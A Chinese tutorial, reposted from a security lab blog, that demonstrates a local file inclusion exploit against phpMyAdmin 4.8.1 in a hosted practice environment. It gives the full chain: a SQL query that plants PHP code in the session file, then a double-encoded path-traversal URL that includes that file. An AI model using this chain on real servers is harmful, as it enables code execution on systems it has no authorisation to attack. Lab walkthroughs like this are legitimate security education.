天天看點

phpMyAdmin 4.8.x(最新版) 本地檔案包含漏洞利用

今天 ChaMd5安全團隊 公開了一個phpMyAdmin最新版中的本地檔案包含漏洞: phpmyadmin4.8.1背景getshell

。該漏洞利用不要求root帳号,隻需能夠登入 phpMyAdmin 便能夠利用。

在這篇文章中我們将使用VulnSpy的

線上 phpMyAdmin 環境

來示範該漏洞的利用。

VulnSpy 線上 phpMyAdmin 環境位址:

http://www.vulnspy.com/phpmyadmin-4.8.1/

漏洞細節

參照ChaMd5安全團隊釋出的文章:

漏洞利用

因為原文中

包含資料庫檔案

可能由于檔案權限或者帳号權限不足而無法利用,這裡我們将使用另外一種方式來利用該檔案包含漏洞,即包含session檔案。

1. 進入VulnSpy

線上 phpMyAdmin 環境位址

,點選 Start to Hack ,跳轉到VSPlate

phpMyAdmin 4.8.x(最新版) 本地檔案包含漏洞利用

2. 等待載入設定後,點選 GO 按鈕開啟實驗

phpMyAdmin 4.8.x(最新版) 本地檔案包含漏洞利用

3. 實驗建立完成後,點選示範位址進入實驗

phpMyAdmin 4.8.x(最新版) 本地檔案包含漏洞利用

4. 使用帳号 root ,密碼 toor 登入 phpMyAdmin

phpMyAdmin 4.8.x(最新版) 本地檔案包含漏洞利用

5. 點選頂部導航欄中的

SQL

按鈕,執行SQL查詢

select '<?php phpinfo();exit;?>'           
phpMyAdmin 4.8.x(最新版) 本地檔案包含漏洞利用

6. 擷取自己的SESSION ID

你的 SESSION ID 為 Cookie 中的

phpMyAdmin

項。

phpMyAdmin 4.8.x(最新版) 本地檔案包含漏洞利用

這樣對應的SESSION檔案為

/var/lib/php/sessions/sess_你的SESSION ID

7. 包含SESSION檔案,成功利用該漏洞

http://1a23009a9c9e959d9c70932bb9f634eb.vsplate.me/index.php?target=db_sql.php%253f/../../../../../../../../var/lib/php/sessions/sess_11njnj4253qq93vjm9q93nvc7p2lq82k           
phpMyAdmin 4.8.x(最新版) 本地檔案包含漏洞利用

本文轉載自:phpMyAdmin 4.8.x LFI Exploit -

http://blog.vulnspy.com/2018/06/21/phpMyAdmin-4-8-x-LFI-Exploit/